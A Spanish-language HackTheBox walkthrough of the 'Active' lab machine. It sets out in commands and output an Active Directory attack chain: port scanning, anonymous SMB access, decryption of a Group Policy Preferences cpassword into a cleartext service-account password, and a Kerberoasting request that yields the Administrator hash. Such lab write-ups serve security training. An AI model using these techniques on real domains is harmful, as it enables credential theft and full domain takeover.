HackTheBox Active

❯ nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.10.100 -oG port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-21 11:37 EDT
Initiating SYN Stealth Scan at 11:37

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
49152/tcp open  unknown          syn-ack ttl 127
49153/tcp open  unknown          syn-ack ttl 127
49154/tcp open  unknown          syn-ack ttl 127
49155/tcp open  unknown          syn-ack ttl 127
49157/tcp open  unknown          syn-ack ttl 127
49158/tcp open  unknown          syn-ack ttl 127
49165/tcp open  unknown          syn-ack ttl 127

Realizaremos un escaneo sobre los puertos abiertos de la máquina Active.

---

❯ nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,49152,49153,49154,49155,49157,49158,49165 10.10.10.100 -oN target.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-21 11:39 EDT
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 11:40 (0:00:18 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.046s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-21 10:10:17Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
|_clock-skew: -5h29m28s
| smb2-time: 
|   date: 2025-04-21T10:11:17
|_  start_date: 2025-04-20T17:58:41

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.92 seconds

Nmap para intenter ver vulnerabilidades y versiones sobre los puertos abiertos encontrados.

---

ldapsearch

❯ ldapsearch -x -H ldap://10.10.10.100 -s base | grep defaultNamingContext
defaultNamingContext: DC=active,DC=htb

❯ ldapsearch -x -H ldap://10.10.10.100 -s base | grep ldapServiceName
ldapServiceName: active.htb:dc$@ACTIVE.HTB

Comprobaremos el nombre del domninio.

---

127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

10.10.10.100 active.htb

Añadimos el dominio al /etc/hosts.

---

❯ enum4linux -a -u "" -p "" 10.10.10.100

[+] Attempting to map shares on 10.10.10.100

//10.10.10.100/ADMIN$	Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/C$	Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/IPC$	Mapping: OK Listing: DENIED Writing: N/A
//10.10.10.100/NETLOGON	Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Replication	Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/SYSVOL	Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/Users	Mapping: DENIED Listing: N/A Writing: N/A

Observamos que podemos acceder al recurso Replication.

---

❯ smbclient //10.10.10.100/Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF 
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> 

Accedemos activamos y nos descargamos todo lo que encontremos.

---

❯ cat Groups.xml
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: Groups.xml
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ <?xml version="1.0" encoding="utf-8"?>
   2   │ <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" chang
       │ ed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOw
       │ hZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userN
       │ ame="active.htb\SVC_TGS"/></User>
   3   │ </Groups>
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
❯ pwd
/home/kali/Desktop/HackTheBox/Active/content/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups

Verificaremos la existencia de un archivo .xml asociado a una política de Grupo, el cual contiene información de un usuario de Active Directory. Este archivo incluye un campo denominado cpasswd, que está cifrado utilizando una clave conocida que forma parte de la configuración predeterminada de las Políticas de Preferencias de Grupo de Windows (GPP).

---

❯ impacket-Get-GPPPassword -xmlfile Groups.xml 'LOCAL'

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Found a Groups XML file:
[*]   file      : Groups.xml
[*]   newName   : 
[*]   userName  : active.htb\SVC_TGS
[*]   password  : GPPstillStandingStrong2k18
[*]   changed   : 2018-07-18 20:46:06

❯ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18

Para descifrar este valor, podemos utilizar herramientas como gpp-decrypt o impacket-Get-GPPPassword.

---

❯ nxc smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
SMB         10.10.10.100    445    DC               [*] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.100    445    DC               C$                              Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.10.100    445    DC               Replication     READ            
SMB         10.10.10.100    445    DC               SYSVOL          READ            Logon server share 
SMB         10.10.10.100    445    DC               Users           READ            


❯ nxc smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --users
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
SMB         10.10.10.100    445    DC               -Username-                    -Last PW Set-       -BadPW- -Description-                                   
SMB         10.10.10.100    445    DC               Administrator                 2018-07-18 19:06:40 0       Built-in account for administering the computer/domain
SMB         10.10.10.100    445    DC               Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.10.10.100    445    DC               krbtgt                        2018-07-18 18:50:36 0       Key Distribution Center Service Account 
SMB         10.10.10.100    445    DC               SVC_TGS                       2018-07-18 20:14:38 0        
SMB         10.10.10.100    445    DC               [*] Enumerated 4 local users: ACTIVE

Enumeramos recursos compartidos y y usuarios activos.

---

❯ smbclient //10.10.10.100/Users -U active.htb/SVC_TGS
Password for [ACTIVE.HTB\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

		5217023 blocks of size 4096. 266824 blocks available
smb: \> cd SVC_TGS/Desktop
smb: \SVC_TGS\Desktop\> dir
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                           AR       34  Sun Apr 20 13:59:50 2025

		5217023 blocks of size 4096. 266824 blocks available
smb: \SVC_TGS\Desktop\> get user.txt

Nos conectamos y tenemos la primera bandera la user.txt.

---

Privilege Escalation

❯ impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request

Procedemos a realizar un ataque de Kerberoasting con el objetivo de identificar servicios en el dominio active.htb que estén asociados a cuentas de usuario. Este ataque nos permite solicitar tickets de servicio Kerberos (TGS) para dichos servicios, los cuales pueden ser crackeados offline con el fin de recuperar las contraseñas en texto claro de las cuentas vinculadas.

Como resultado, se obtuvo un hash Kerberos (KRB5-TGS) correspondiente a la cuenta Administrator.

Guardamos el hash obtenido.

---

Crackeamos y tenemos la contraseña del administrador.

---

Y maquina resuelta.